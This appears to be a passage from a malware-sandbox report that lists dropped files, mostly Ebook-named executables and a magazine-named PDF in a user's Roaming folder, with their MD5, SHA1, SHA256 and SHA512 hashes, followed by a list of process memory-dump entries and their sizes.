bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe

MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
C:\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
C:\Users\Admin\AppData\Roaming\EbookRplg.exe

MD5
27a3654950322a5d1d601ebd25a3dfa2

SHA1
021b03d043ef146920a137550bb731c545061c6a

SHA256
876a1acaeaf0c6db33ea73468c7599e631b6614f8c20e7012cfbd70204341d4b

SHA512
76a6faca17a438a524d8c7562e07e6920d5dec6ac116132916ed363a098a4d52b72b7cdf912880cca4fd7825caa6a60a324a2dc31b9c704c79beee560c7c95c3

Download Submit
C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf

MD5
fba5105a8c3d44d986eccd5f50afa10c

SHA1
96c6ca621f300db6f5b0c031427706ed3600ee43

SHA256
a20407d4bf88efde6f231a7d0b1e5d8797b7a4b2f2f77fbc779eaf922649b37c

SHA512
f85288408d0a9b14102ac82615cb9f8aa852abab992116fdfbf13695a9028f6c37d0be29aeea0f6df430cb01f084ab8dd3416ec24e1276811dc9143119c57130

Download Submit
memory/652-19-0x0000000000000000-mapping.dmp

Download
memory/816-38-0x0000000000000000-mapping.dmp

Download
memory/1052-34-0x0000000000000000-mapping.dmp

Download
memory/1228-40-0x0000000000000000-mapping.dmp

Download
memory/1528-15-0x0000000000000000-mapping.dmp

Download
memory/1564-49-0x0000000000000000-mapping.dmp

Download
memory/1800-50-0x0000000000000000-mapping.dmp

Download
memory/2040-32-0x0000000000000000-mapping.dmp

Download
memory/2052-18-0x0000000000000000-mapping.dmp

Download
memory/2132-37-0x0000000000000000-mapping.dmp

Download
memory/2168-22-0x0000000000000000-mapping.dmp

Download
memory/2168-44-0x0000000000000000-mapping.dmp

Download
memory/2184-48-0x0000000000000000-mapping.dmp

Download
memory/2208-23-0x0000000000000000-mapping.dmp

Download
memory/2260-86-0x0000000000000000-mapping.dmp

Download
memory/2260-85-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/2316-31-0x0000000000000000-mapping.dmp

Download
memory/2348-33-0x0000000000000000-mapping.dmp

Download
memory/2352-51-0x0000000000000000-mapping.dmp

Download
memory/2596-56-0x0000000005980000-0x0000000005981000-memory.dmp

Filesize
4KB

Download
memory/2596-60-0x0000000005960000-0x0000000005965000-memory.dmp

Filesize
20KB

Download
memory/2596-17-0x0000000072800000-0x0000000072EEE000-memory.dmp

Filesize
6.9MB

Download
memory/2596-55-0x0000000005830000-0x0000000005861000-memory.dmp

Filesize
196KB

Download
memory/2596-3-0x0000000000000000-mapping.dmp

Download
memory/2596-24-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/2596-62-0x0000000005D20000-0x0000000005D21000-memory.dmp

Filesize
4KB

Download
memory/2628-52-0x0000000000000000-mapping.dmp

Download
memory/2704-45-0x0000000000000000-mapping.dmp

Download
memory/2740-36-0x0000000000000000-mapping.dmp

Download
memory/2816-28-0x0000000000000000-mapping.dmp

Download
memory/2888-14-0x0000000000000000-mapping.dmp

Download
memory/2932-1-0x0000000000000000-mapping.dmp

Download
memory/3012-42-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/3012-25-0x0000000000570000-0x0000000000571000-memory.dmp

Filesize
4KB

Download
memory/3012-29-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/3012-58-0x0000000004F80000-0x0000000004F85000-memory.dmp

Filesize
20KB

Download
memory/3012-5-0x0000000000000000-mapping.dmp

Download
memory/3012-16-0x0000000072800000-0x0000000072EEE000-memory.dmp

Filesize
6.9MB

Download
memory/3012-54-0x0000000004EC0000-0x0000000004EED000-memory.dmp

Filesize
180KB

Download
memory/3248-47-0x0000000000000000-mapping.dmp

Download
memory/3340-35-0x0000000000000000-mapping.dmp

Download
memory/3380-11-0x0000000000000000-mapping.dmp

Download
memory/3492-79-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/3492-80-0x0000000000000000-mapping.dmp

Download
memory/3636-10-0x0000000000000000-mapping.dmp

Download
memory/3776-41-0x0000000000000000-mapping.dmp

Download
memory/3844-13-0x0000000000000000-mapping.dmp

Download
memory/3860-20-0x0000000000000000-mapping.dmp

Download
memory/3868-39-0x0000000000000000-mapping.dmp

Download
memory/3884-21-0x0000000000000000-mapping.dmp

Download
memory/4040-46-0x0000000000000000-mapping.dmp

Download
memory/4236-64-0x0000000000000000-mapping.dmp

Download
memory/4608-82-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/4608-83-0x0000000000000000-mapping.dmp

Download
memory/5084-65-0x0000000000000000-mapping.dmp

Download
memory/5768-66-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/5768-67-0x0000000000000000-mapping.dmp

Download
memory/5804-69-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/5804-70-0x0000000000000000-mapping.dmp

Download
memory/5992-74-0x0000000077A12000-0x0000000077A1200C-memory.dmp

Filesize
12B

Download
memory/5992-75-0x0000000000000000-mapping.dmp

Download